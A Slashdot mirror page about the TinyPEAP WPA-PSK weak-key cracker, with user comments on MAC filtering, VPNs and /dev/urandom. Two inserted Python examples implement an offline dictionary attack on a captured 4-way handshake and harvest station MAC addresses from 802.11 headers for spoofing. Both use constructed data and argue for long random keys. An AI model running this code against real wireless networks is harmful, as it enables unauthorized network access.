Slashdot Mirror


WPA Weak Key Cracker Posted

Glenn Fleishman writes "The folks at TinyPEAP released a cracking tool to break Wi-Fi Protected Access (WPA) keys. WPA is the replacement for weak WEP keys in the original 802.11b specification. Robert Moskowitz of ICSA Labs released a paper almost exactly a year ago documenting how WPA keys that were short and lacked randomness could be subject to cracks. This tool automates the process. Moskowitz advised choosing passphrases of more than 20 characters or generating random keys of at least 96 bits, but preferably 128 bits. Some tools exist to produce better keys, including chipmaker Broadcom's SecureEZSetup (in selected hardware) and Buffalo Technologies' hardware-based AOSS for automatic key generation and propagation. Enterprise-based WPA with 802.1X doesn't have this weakness: each user gets a long WPA key that's randomly generated and uniquely assigned--and can be frequently changed during a session."
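The attack the summary describes, worked through as an added example (this is not TinyPEAP's code and not from the original post). In WPA-PSK the pairwise master key is PBKDF2-HMAC-SHA1 over the passphrase and SSID (4096 iterations); the pairwise transient key is PRF-512 over the PMK plus both MAC addresses and both nonces, all of which are sent in the clear during the 4-way handshake; and message 2 carries a MIC keyed by the first 16 bytes of the PTK. So one captured handshake lets an attacker test guesses entirely offline, which is why short, dictionary-like passphrases fall and a 20+ character or 96-bit-plus random key does not. The SSID, MAC addresses, nonces, wordlist and the EAPOL-Key frame are all constructed here; the frame follows the 802.11i layout only far enough to carry a MIC.

```python
"""Offline dictionary attack on a WPA-PSK 4-way handshake (added example, constructed data)."""
import hashlib
import hmac
import secrets
from typing import NamedTuple, Optional, Sequence

MIC_OFFSET = 81  # byte offset of the 16-byte Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 'Pairwise key expansion'; everything but the PMK is visible on the air."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)  # 4 x 20 bytes, truncated to the 64-byte PTK
    )
    return out[:64]


def eapol_mic(kck: bytes, frame: bytes, version: int) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    Key descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) HMAC-SHA1; both truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.md5 if version == 1 else hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, version: int = 2, replay_counter: int = 1) -> bytes:
    """EAPOL-Key message 2 of 4 (supplicant -> AP) with an all-zero MIC field (constructed)."""
    key_info = version | (1 << 3) | (1 << 8)  # descriptor version, Pairwise, MIC present
    body = (bytes([254]) + key_info.to_bytes(2, "big") + (0).to_bytes(2, "big")  # 254 = WPA key descriptor
            + replay_counter.to_bytes(8, "big") + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + (0).to_bytes(2, "big"))
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body  # 802.1X v1, packet type EAPOL-Key


class Handshake(NamedTuple):
    ssid: str
    aa: bytes        # authenticator (AP) MAC
    spa: bytes       # supplicant (client) MAC
    anonce: bytes
    snonce: bytes
    msg2: bytes      # captured message 2 with the supplicant's MIC filled in
    version: int


def supplicant_sign(pmk, ssid, aa, spa, anonce, snonce, version=2) -> Handshake:
    """What a legitimate client does: derive the PTK and put a MIC on message 2."""
    kck = prf512(pmk, aa, spa, anonce, snonce)[:16]
    frame = build_msg2(snonce, version)
    mic = eapol_mic(kck, frame, version)
    return Handshake(ssid, aa, spa, anonce, snonce,
                     frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:], version)


def crack_psk(hs: Handshake, wordlist: Sequence[str]) -> Optional[str]:
    """What the cracker does: recompute the MIC for every guess; no AP interaction needed."""
    captured_mic = hs.msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        kck = prf512(pmk_from_passphrase(guess, hs.ssid), hs.aa, hs.spa, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.msg2, hs.version), captured_mic):
            return guess
    return None


def demo():
    """A weak passphrase falls to a four-word list; a random 256-bit PSK (used directly as PMK) does not."""
    ssid, aa, spa = "homenet", bytes.fromhex("00112233aabb"), bytes.fromhex("00aabbccddee")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))  # constructed, fixed for reproducibility
    wordlist = ["password", "letmein", "sunshine1", "dragon"]
    weak = supplicant_sign(pmk_from_passphrase("sunshine1", ssid), ssid, aa, spa, anonce, snonce)
    strong = supplicant_sign(bytes.fromhex(secrets.token_hex(32)), ssid, aa, spa, anonce, snonce)
    return crack_psk(weak, wordlist), crack_psk(strong, wordlist)


if __name__ == "__main__":
    print(demo())
```

Each guess costs one PBKDF2 run of 4096 HMAC-SHA1 iterations, which is the only thing slowing the attacker down; the cost is per guess, not per handshake, so the defence is the size of the space the passphrase is drawn from, not the time it takes to capture the handshake.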

20 of 168 comments

  1. So it's just a bruteforce/dictionary tool... by zaffir · Score: 2, Informative

    What's the big deal? Kismac has had this feature for a while. I hope i'm missing something.

    --
    "Upon attaching the waterblock to my penis, I began to notice that I know nothing about computers." -- JRockway
    1. Re:So it's just a bruteforce/dictionary tool... by zaffir · Score: 3, Informative

      Notice i said Kismac, not Kismet. This new tool doesn't do anything special when attacking WPA. It isn't even the first to do this non-special thing.

      --
      "Upon attaching the waterblock to my penis, I began to notice that I know nothing about computers." -- JRockway
  2. Re:What Morons by Sarhosh Amiral · Score: 2, Informative

    It does not have to be cracked, MAC filtering does not prevent from others listening the network.

  3. Re:By its nature... by davesplace1 · Score: 0, Informative

    You make a good point, I know that I would not do any "online" banking with wifi.

  4. Re:What Morons by Anonymous Coward · Score: 2, Informative

    Um, do you know how easy it is to spoof MAC addresses? Very easy.

  5. Re:Odds of implementation? by EnronHaliburton2004 · Score: 2, Informative

    > WEP

    Er, you mean WPA?

  6. Re:What Morons by wcdw · Score: 3, Informative

    NOT really a good idea to start a thread about morons, and then act like one.

    _YOUR_ wlan card may have the MAC address burned into it. Once ALL NICs did. I think it was more than 10 years ago that I saw my first NIC that DID NOT HAVE a MAC address (it was all zeroes, and expected to be set in software).

    _MY_ wlan card will _CERTAINLY_ let me change the MAC address - under Linux _or_ Windows.

    http://www.theboyz.biz/Computers, parts, electronics, small appliances and more!

    --
    If you're not living on the edge, you're just taking up space!
  7. Re:don't blame WPA by nbert · Score: 2, Informative

    arghh - let's blame my caffeine consumption...

    Here's the correct link

  8. Re:WPA Keys by Olmy's Jart · Score: 3, Informative
    Yes... Several..


    Do your homework. Look up Supplicant, XSupplication, HostAP, 802.11i for Linux, 802.1x for Linux, etc, etc, etc... Lots of things going on.


    ITMT... This crack is only for weak keys with WPA-PSK. Not applicable to WPA enterprise or WPA2.

  9. Re:What Morons by arth1 · Score: 3, Informative
    > you need to brute-force check each MAC address. there are ways to make this harder in the router.

    No, you don't have to do this. Once the WEP key is broken (or if there is no WEP key, just MAC filtering), you simply listen to the traffic to get a MAC address that's allowed, and use that.

    Regards,
    --
    *Art
  10. Just name all your specific MAC addresses by NotQuiteReal · Score: 1, Informative
    This will also help secure your network.

    How many home networks really need to allow random MAC addresses access?

    --
    This issue is a bit more complicated than you think.
  11. Re:By its nature... by KingPunk · Score: 1, Informative

    just generate a key from /dev/urandom on nix. doesn't get any more random than that.

    and I'm fairly certain it won't be compromised any time in the near future
    ;)
    --kingpunk

  12. Re:By its nature... by Fweeky · Score: 4, Informative

    Looked at OpenVPN? Seems a lot easier to configure than a VPN.

  13. Re:Suggestion by slashname3 · Score: 3, Informative

    The best thing you can do in addition to using WEP, changing keys, and locking down the MAC addresses allowed, is to use ssh or VPN software to encrypt your connections. If someone spends enough time to crack WEP and spoof a MAC address then the most they can get is access through your access point. They would have to break ssh or VPN to look at your data. Of course you would need to have tools in place to identify a man in the middle attack to prevent them from spoofing your connections.

    Of course if someone spends that much effort just to break into your wireless network you either have something really important or they have way too much time on their hands. (and I doubt if anyone has anything that important on their network....)

  14. Re:What Morons by wfberg · Score: 3, Informative

    MAC addresses are universally unique identifiers, except for a few duplicate runs in cheap-ass brand NICs.

    It's just that they cannot be authenticated in any way. It's like allowing only people who claim to be you on your network, rather than people who can prove it in some way.

    --
    SCO employee? Check out the bounty
  15. Re:What Morons by zzyrc · Score: 2, Informative

    The frame control that contains the MAC header in an 802.11 packet is always unencrypted. So the list of MAC addresses is available at once, before key cracking.
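To make the point in the MAC-filtering subthread concrete, here is an added example (not from any poster) that parses the MAC header of 802.11 data frames and harvests which station addresses talk to which BSSID. The three address fields sit in the header ahead of the body, so they are readable even when the Protected Frame flag is set and the payload is WEP, TKIP or CCMP encrypted; an attacker simply reuses one of the addresses seen. The frames, addresses and payload bytes are constructed; the header layout and flag bits follow the 802.11 standard.

```python
"""Read MAC addresses out of the always-cleartext 802.11 MAC header (added example, constructed frames)."""
import os
import struct
from typing import Dict, List, NamedTuple, Optional, Set


class Dot11Header(NamedTuple):
    ftype: int           # 0 management, 1 control, 2 data
    subtype: int
    to_ds: bool
    from_ds: bool
    protected: bool      # Protected Frame flag: the body is encrypted, the header never is
    addr1: str
    addr2: str
    addr3: str
    addr4: Optional[str]
    header_len: int


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_dot11_header(frame: bytes) -> Dot11Header:
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    fc, flags = frame[0], frame[1]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF     # bits 0-1 are the protocol version
    to_ds, from_ds, protected = bool(flags & 0x01), bool(flags & 0x02), bool(flags & 0x40)
    addr4, hlen = None, 24
    if to_ds and from_ds:                                  # WDS frames carry a fourth address
        if len(frame) < 30:
            raise ValueError("truncated 4-address header")
        addr4, hlen = mac_str(frame[24:30]), 30
    if ftype == 2 and subtype & 0x8:                       # QoS data: extra 2-byte QoS Control field
        hlen += 2
    return Dot11Header(ftype, subtype, to_ds, from_ds, protected,
                       mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]), addr4, hlen)


def bssid_and_station(h: Dot11Header):
    """Which field is the BSSID and which the station depends on the To DS / From DS flags."""
    if h.to_ds and not h.from_ds:
        return h.addr1, h.addr2        # station -> AP: addr1 = BSSID, addr2 = SA
    if h.from_ds and not h.to_ds:
        return h.addr2, h.addr1        # AP -> station: addr2 = BSSID, addr1 = DA
    if not h.to_ds and not h.from_ds:
        return h.addr3, h.addr2        # ad hoc: addr3 = BSSID, addr2 = SA
    return None, None                  # WDS: no single BSSID


def build_data_frame(src: bytes, dst: bytes, bssid: bytes, protected: bool = True,
                     seq: int = 0, body: bytes = b"") -> bytes:
    """Constructed station -> AP data frame; body stands in for the encrypted payload."""
    fc = (2 << 2) | (0 << 4)                   # type data, subtype 0
    flags = 0x01 | (0x40 if protected else 0)  # To DS, Protected Frame
    return bytes([fc, flags]) + b"\x00\x00" + bssid + src + dst + struct.pack("<H", seq << 4) + body


def stations_per_bssid(frames: List[bytes]) -> Dict[str, Set[str]]:
    """Harvest BSSID -> stations from captured data frames, encrypted or not."""
    seen: Dict[str, Set[str]] = {}
    for f in frames:
        h = parse_dot11_header(f)
        if h.ftype != 2:
            continue
        bssid, sta = bssid_and_station(h)
        if bssid is not None:
            seen.setdefault(bssid, set()).add(sta)
    return seen


def demo() -> Dict[str, Set[str]]:
    ap = bytes.fromhex("001122aabbcc")
    sta1, sta2 = bytes.fromhex("00aa11bb22cc"), bytes.fromhex("00dd33ee44ff")
    gateway = bytes.fromhex("000c29000001")
    frames = [build_data_frame(s, gateway, ap, body=os.urandom(40), seq=i)
              for i, s in enumerate([sta1, sta2, sta1])]      # "encrypted" bodies are random bytes
    return stations_per_bssid(frames)


if __name__ == "__main__":
    print(demo())
```

Every frame in the demo has the Protected Frame bit set, yet both station addresses come straight out of the header. Allow-listing those addresses on the AP therefore stops nobody who can sniff one frame and set their card's address, which is the point made in this subthread.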

  16. WPA er Old News! by fogez · Score: 3, Informative

    KisMAC has had this function for a long time. Someone used it at Hope 2004 to crack their wifi key. In addition, Josh Wright has had a working copy available for linux for some time. The LiveCD from Remote-exploit.org (Auditor) has included this tool for about a month now. This is not new...

  17. Re:Ho hum by Dr. Evil · Score: 2, Informative

    Note that WPA is just like WEP but with quickly rotating keys and more secure key exchange. Yeah, you can't crack it in real-time to get on the network... but if you listen to the vendors carefully, they'll even say it... "Authentication, Authorization.... " But never will they formally say "Secure encryption of data"

    You can decode everything but the key exchange off-line.

    VPN software is the only way to go. The wireless vendors are liars.

    Does anyone want to comment on WPA2? Does it require new hardware?

  18. Re:By its nature... by SillyNickName4me · Score: 2, Informative

    > just generate a key from /dev/urandom on nix. doesn't get any more random than that

    Maybe you are talking about a specific implementation here (Linux I bet) and details are slightly different between different unix like systems... /dev/urandom is not random at all, it is pseudo-random at best.

    The basic issue is that as soon as you think up a process that generates numbers in a way that you can describe mathematically, you also end up with a process incapable of generating real randomness.

    You can get most aspects of randomness, but what you won't get, and that is the most important part for encryption, is unpredictability.

    How predictable things are depends for a bit on the algorithm that you use, and for a large part on the ability to deduce the current state of the 'random generator'. If those 2 are known, the next number your random generator will produce can also be known.

    This is why it is so important to have a good entropy source, it makes it virtually impossible to guess at the state of the generator.

  19. Re:By its nature... by peter · Score: 2, Informative

    > /dev/urandom is not random at all, it is pseudo-random at best.

    On Linux, that's wrong. /dev/urandom returns very high quality pseudo-random at _worst_. /dev/random never resorts to mere pseudo randomness, and read(2)s on it block until the kernel has accumulated enough entropy in its pool. (yes, Linux maintains an entropy pool which it seeds from random events so there is some true randomness waiting for programs like gnupg or statistical simulations that need it.)

    You're correct about everything else, though. The only thing you didn't know is that /dev/random doesn't come from a purely algorithmic source. Kernels have access to more than just a Turing machine :).

    > This is why it is so important to have a good entropy source, it makes it
    > virtually impossible to guess at the state of the generator.

    Now you're talking. That's why Linux uses the low bits of the CPU's clock cycle counter sampled during interrupts (which are generated by disks, the network, keyboards, and mice, etc. i.e. fairly unpredictable things, esp. wrt. exact numbers of CPU cycles!) It mixes these samples into its pool with cryptographically strong algorithms (insert hand-waving here... :), so even if the samples aren't very random, they don't make it worse.

    If you're totally paranoid, RML's netdev-random patch will let you choose whether you want to add entropy from network interrupts to the entropy pool. Of course, you could also use rngd from rng-tools to feed entropy from your chipset's built-in rng (which measures thermal noise, and so has randomness that comes fairly directly from quantum mechanical processes, the only known source of true unpredictability in the Universe.)

    --
    #define X(x,y) x##y
    Peter Cordes ; e-mail: X(peter@cordes , .ca)